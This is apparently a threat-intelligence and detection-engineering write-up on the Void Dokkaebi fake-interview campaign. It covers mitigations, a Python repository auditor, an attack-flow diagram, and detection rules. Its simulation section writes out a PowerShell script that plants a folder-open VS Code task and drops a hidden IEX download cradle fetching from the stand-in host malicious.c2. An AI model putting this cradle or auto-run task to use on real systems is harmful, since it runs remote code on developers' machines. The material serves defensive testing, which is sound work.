Fake Interview Lures Used by Void Dokkaebi to Spread Malware Through Git Repositories
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Void Dokkaebi, a North Korea-linked threat group, is using fake job interview offers to lure developers into cloning malicious repositories. Once opened, these repositories abuse injected VS Code tasks and obfuscated JavaScript to turn trusted code projects into automated malware delivery channels. Infected repositories can then help spread the compromise further across developer environments and connected ecosystems.
Investigation
Trend Micro uncovered more than 750 infected public repositories, over 500 malicious VS Code task configurations, and 101 cases involving a custom batch script designed to tamper with commits. Analysis showed that the malicious code fetched payloads through blockchain-based services and ultimately delivered a DEV#POPPER RAT variant. That malware then communicated with attacker infrastructure through both WebSocket and HTTP-based channels.
Mitigation
Recommended defenses include isolating code received through interview processes, adding .vscode/ to .gitignore, enforcing signed commits and branch protection, and auditing repositories for known infection markers. Security teams should also monitor blockchain API traffic for suspicious behavior and block access to the identified command-and-control URLs. Developers should treat VS Code workspace trust prompts as a meaningful security checkpoint, not a routine click-through action.
Response
If infection is suspected, isolate the affected workstation immediately, revoke any exposed credentials, remove malicious .vscode task files and injected JavaScript, and perform a full review of the impacted repository. Network defenses should also be updated to detect the known command-and-control patterns and block outbound communication to the identified blockchain endpoints.
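An added example, not part of the original write-up, of the repository audit recommended under Mitigation and the artifact review under Response: it walks a checkout looking for the markers this page names (a .vscode/tasks.json task with runOn folderOpen, a hidden .node_modules directory, temp_auto_push.bat, and JavaScript carrying the global['!'] and global['_V'] strings). demo() builds a constructed sample checkout in a temporary directory; the file contents there are invented for the test, not samples from the campaign.

```python
import json
import re
import tempfile
from pathlib import Path

# Markers named in the write-up: auto-run task, hidden module dir, batch file, injected-JS strings.
JS_MARKERS = (re.compile(r"global\['!'\]"), re.compile(r"global\['_V'\]"))
SUSPICIOUS_NAMES = {"temp_auto_push.bat", ".node_modules"}
JS_SUFFIXES = {".js", ".mjs", ".cjs"}

def folder_open_tasks(tasks_json: Path) -> list:
    """Return labels of tasks configured to run as soon as the folder is opened."""
    try:
        data = json.loads(tasks_json.read_text(encoding="utf-8-sig"))
    except (OSError, ValueError):
        return ["<unparseable tasks.json>"]  # JSONC or a damaged file still deserves review
    tasks = data.get("tasks", []) if isinstance(data, dict) else []
    return [t.get("label", "<unlabelled>") for t in tasks if isinstance(t, dict)
            and (t.get("runOptions") or {}).get("runOn") == "folderOpen"]

def audit_repo(root: str) -> list:
    """Walk a checkout and return (relative path, reason) pairs; [] means no markers found."""
    findings = []
    for path in Path(root).rglob("*"):
        rel = path.relative_to(root).as_posix()
        if path.name in SUSPICIOUS_NAMES:
            findings.append((rel, "known infection artifact name"))
        if path.name == "tasks.json" and path.parent.name == ".vscode":
            for label in folder_open_tasks(path):
                findings.append((rel, f"task '{label}' runs on folderOpen"))
        if path.is_file() and path.suffix in JS_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="ignore")
            if all(m.search(text) for m in JS_MARKERS):
                findings.append((rel, "obfuscated JS markers global['!'] and global['_V']"))
    return findings

def demo() -> list:
    """Build a constructed sample checkout in a temp dir, audit it, return sorted findings."""
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp)
        (repo / ".vscode").mkdir()
        (repo / ".vscode" / "tasks.json").write_text(json.dumps({"version": "2.0.0", "tasks": [
            {"label": "AutoPush", "type": "shell", "command": "cscript loader.js",
             "runOptions": {"runOn": "folderOpen"}}]}), encoding="utf-8")
        (repo / "postcss.config.mjs").write_text(  # constructed stand-in for the injected config
            "export default {};\n(function(){global['!']=1;global['_V']='x';})();", encoding="utf-8")
        (repo / ".node_modules").mkdir()
        (repo / "src").mkdir()
        (repo / "src" / "index.js").write_text("console.log('clean');", encoding="utf-8")
        return sorted(audit_repo(str(repo)))
```

Run audit_repo against the root of each cloned interview repository before opening it in an editor; the clean src/index.js in the sample shows ordinary JavaScript is not flagged.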
graph TB
  %% Class definitions
  classDef stage fill:#e6f7ff
  classDef technique fill:#fff2cc
  classDef file fill:#f0e68c
  classDef malware fill:#ffcccc
  classDef indicator fill:#d9ead3
  %% Node definitions
  stage_initial["<b>Stage</b> – Initial Access<br/>Attacker lures developer with fake interview and malicious Git repository"]
  class stage_initial stage
  tech_user_exec["<b>Technique</b> – T1204 User Execution<br/>Victim executes malicious content such as a link or copied code"]
  class tech_user_exec technique
  tech_malicious_link["<b>Technique</b> – T1204.001 Malicious Link<br/>Link directs victim to malicious repository"]
  class tech_malicious_link technique
  tech_malicious_copy["<b>Technique</b> – T1204.004 Malicious Copy and Paste<br/>Developer copies code from the malicious repository"]
  class tech_malicious_copy technique
  stage_repo_harvest["<b>Stage</b> – Repository Harvest<br/>Cloned repository gives access to source code and potential credentials"]
  class stage_repo_harvest stage
  tech_code_repo["<b>Technique</b> – T1213.003 Data from Information Repositories: Code Repositories<br/>Adversary extracts data from code repositories"]
  class tech_code_repo technique
  stage_execution_vs["<b>Stage</b> – Execution via VS Code<br/>.vscode/tasks.json runs downloader automatically on folder open"]
  class stage_execution_vs stage
  tech_trusted_ide["<b>Technique</b> – T1127 Trusted Developer Utilities Proxy Execution<br/>Abuse of trusted IDE extensions to execute code"]
  class tech_trusted_ide technique
  tech_ide_ext["<b>Technique</b> – T1176.002 Software Extensions: IDE Extensions<br/>Malicious tasks.json triggers execution"]
  class tech_ide_ext technique
  file_tasks_json["<b>File</b> – .vscode/tasks.json<br/>Configured with runOn folderOpen to launch downloader"]
  class file_tasks_json file
  stage_payload_retrieval["<b>Stage</b> – Payload Retrieval<br/>Downloader fetches payloads from blockchain RPC endpoints"]
  class stage_payload_retrieval stage
  tech_resource_hijack["<b>Technique</b> – T1496 Resource Hijacking<br/>Utilizes blockchain infrastructure for payload delivery"]
  class tech_resource_hijack technique
  tech_obfuscation["<b>Technique</b> – T1027.007 Obfuscated Files or Information: Dynamic API Resolution<br/>Code hides API endpoints and resolves them at runtime"]
  class tech_obfuscation technique
  indicator_blockchain["<b>Indicator</b> – Outbound blockchain RPC connections<br/>Calls to api.trongrid.io, aptoslabs.com and BSC RPC"]
  class indicator_blockchain indicator
  stage_module_hijack["<b>Stage</b> – Module Hijacking<br/>Hidden .node_modules directory placed to preload malicious Node modules"]
  class stage_module_hijack stage
  tech_shared_modules["<b>Technique</b> – T1129 Shared Modules<br/>Malicious module loaded before legitimate ones"]
  class tech_shared_modules technique
  file_node_modules["<b>File</b> – .node_modules directory<br/>Contains hijacked module"]
  class file_node_modules file
  stage_rat_deployment["<b>Stage</b> – RAT Deployment<br/>DEV#POPPER RAT variant establishes WebSocket C2 and exfiltrates data"]
  class stage_rat_deployment stage
  malware_devpopper["<b>Malware</b> – DEV#POPPER RAT<br/>WebSocket C2, file exfiltration, avoids CI/CD pipelines"]
  class malware_devpopper malware
  indicator_c2["<b>Indicator</b> – WebSocket C2 URLs"]
  class indicator_c2 indicator
  stage_persistence["<b>Stage</b> – Persistence and Commit Tampering<br/>Injected malicious JavaScript in config files and batch script amends commits"]
  class stage_persistence stage
  tech_timestomp["<b>Technique</b> – T1070.006 Indicator Removal: Timestomp<br/>Alters system clock to backdate commits"]
  class tech_timestomp technique
  file_postcss["<b>File</b> – postcss.config.mjs<br/>Obfuscated JavaScript injected"]
  class file_postcss file
  file_batch["<b>File</b> – temp_auto_push.bat<br/>Automates commit amendment and force-push"]
  class file_batch file
  stage_propagation["<b>Stage</b> – Propagation<br/>Malicious .vscode folder and code committed, downstream developers inherit infection"]
  class stage_propagation stage
  tech_propagation["<b>Technique</b> – T1127 Trusted Developer Utilities Proxy Execution<br/>Repeated IDE abuse across cloned repositories"]
  class tech_propagation technique
  tech_repo_spread["<b>Technique</b> – T1213.003 Data from Information Repositories<br/>Malicious code spreads via repository sharing"]
  class tech_repo_spread technique
  indicator_detection["<b>Indicator</b> – Detection IOCs<br/>Blockchain RPC, WebSocket C2, /verify-human/ and /u/f HTTP paths"]
  class indicator_detection indicator
  %% Connections
  stage_initial -->|uses| tech_user_exec
  tech_user_exec -->|includes| tech_malicious_link
  tech_user_exec -->|includes| tech_malicious_copy
  tech_malicious_link -->|delivers| stage_repo_harvest
  tech_malicious_copy -->|delivers| stage_repo_harvest
  stage_repo_harvest -->|exploits| tech_code_repo
  stage_repo_harvest -->|leads to| stage_execution_vs
  stage_execution_vs -->|uses| tech_trusted_ide
  stage_execution_vs -->|uses| tech_ide_ext
  stage_execution_vs -->|executes| file_tasks_json
  stage_execution_vs -->|triggers| stage_payload_retrieval
  stage_payload_retrieval -->|uses| tech_resource_hijack
  stage_payload_retrieval -->|uses| tech_obfuscation
  stage_payload_retrieval -->|creates| indicator_blockchain
  stage_payload_retrieval -->|leads to| stage_module_hijack
  stage_module_hijack -->|uses| tech_shared_modules
  stage_module_hijack -->|contains| file_node_modules
  stage_module_hijack -->|leads to| stage_rat_deployment
  stage_rat_deployment -->|deploys| malware_devpopper
  malware_devpopper -->|communicates with| indicator_c2
  stage_rat_deployment -->|prepares for| stage_persistence
  stage_persistence -->|uses| tech_timestomp
  stage_persistence -->|modifies| file_postcss
  stage_persistence -->|runs| file_batch
  stage_persistence -->|enables| stage_propagation
  stage_propagation -->|uses| tech_propagation
  stage_propagation -->|uses| tech_repo_spread
  stage_propagation -->|produces| indicator_detection
Attack Flow
Detections
- Possible Publicnode Ethereum Abuse Attempt As C2 Channel (via dns_query)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
- Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
- Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [MACOS] (via file_event)
- Possible Vscode Automatic Tasks Configuration File Created In Unusual Directory [LINUX] (via file_event)
- IOCs (SourceIP) to detect: Fake Interview Lures Used by Void Dokkaebi to Spread Malware Through Git Repositories
- IOCs (DestinationIP) to detect: Fake Interview Lures Used by Void Dokkaebi to Spread Malware Through Git Repositories
- Detection of Void Dokkaebi Malicious VS Code Tasks and Obfuscated JavaScript [Windows File Event]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
An attacker who has convinced a developer to clone a malicious repository drops a covert VS Code tasks.json into the project’s .vscode folder. The task references a temp_auto_push.bat script located in the system’s temporary directory. The batch file is generated on-the-fly from an obfuscated JavaScript snippet that embeds the markers global['!'] and global['_V']. When the developer opens the folder in VS Code, the task auto-runs, executing the batch file, which ultimately reaches out to a C2 server. This chain fulfills T1053.007 (VS Code task), T1127.003 (persistent shortcut via batch), and T1027.007 (obfuscation). The steps are:
- Place malicious tasks.json with the required strings.
- Create the obfuscated JavaScript that, when evaluated, writes temp_auto_push.bat containing the malicious command.
- Trigger VS Code task execution (simulated by invoking the task via the code --folder-uri CLI).
Regression Test Script:
# -------------------------------------------------
# Void Dokkaebi VS Code Task & Obfuscated JS Simulation
# -------------------------------------------------
$vscodeDir = Join-Path $env:USERPROFILE ".vscode"
$taskFile  = Join-Path $vscodeDir "tasks.json"
$tempBat   = Join-Path $env:TEMP "temp_auto_push.bat"
# The obfuscated JS is written to its own file because cscript cannot read a
# script from stdin; the file name mirrors the injected config file seen in the campaign.
$jsFile    = Join-Path $env:USERPROFILE "postcss.config.mjs"
# JScript string literals treat backslashes as escapes, so double them in the embedded path
$tempBatJs = $tempBat.Replace('\', '\\')
$jsPayload = @"
(function(){
  var global = this;           // WSH JScript has no 'global' object; alias the root object
  global['!'] = true;          // marker for detection
  global['_V'] = 'payload';    // marker for detection
  var cmd = 'powershell -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString(\'http://malicious.c2/payload.ps1\'))"';
  var fso = new ActiveXObject('Scripting.FileSystemObject');
  var file = fso.CreateTextFile('$tempBatJs', true);
  file.WriteLine(cmd);
  file.Close();
})();
"@
# 1. Ensure .vscode folder exists
New-Item -ItemType Directory -Path $vscodeDir -Force | Out-Null
# 2. Write the obfuscated JS and a tasks.json that auto-runs it on folder open
Set-Content -Path $jsFile -Value $jsPayload -Encoding ASCII
@"
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "AutoPush",
      "type": "shell",
      "command": "cscript //nologo //E:jscript //B \"$($jsFile.Replace('\', '\\'))\"",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
"@ | Set-Content -Path $taskFile -Encoding UTF8
# 3. (Optional) Directly invoke the task to mimic VS Code auto-run
# Note: In a real environment VS Code would parse and run this task.
Write-Host "Malicious VS Code task deployed. Triggering via simulated run..."
cscript //nologo //E:jscript //B $jsFile
Write-Host "Simulation complete. Check SIEM for alert."
Cleanup Commands:
# Remove malicious artifacts (tasks.json, the JS file written by the regression script, and the batch file)
Remove-Item -Path (Join-Path $env:USERPROFILE ".vscode\tasks.json") -Force -ErrorAction SilentlyContinue
Remove-Item -Path (Join-Path $env:USERPROFILE "postcss.config.mjs") -Force -ErrorAction SilentlyContinue
Remove-Item -Path (Join-Path $env:TEMP "temp_auto_push.bat") -Force -ErrorAction SilentlyContinue
# Optionally clear the .vscode directory if it was created solely for the test
$vscodeDir = Join-Path $env:USERPROFILE ".vscode"
if ((Test-Path $vscodeDir) -and (@(Get-ChildItem $vscodeDir -Force).Count -eq 0)) {
    Remove-Item -Path $vscodeDir -Force -Recurse -ErrorAction SilentlyContinue
}
Write-Host "Cleanup completed."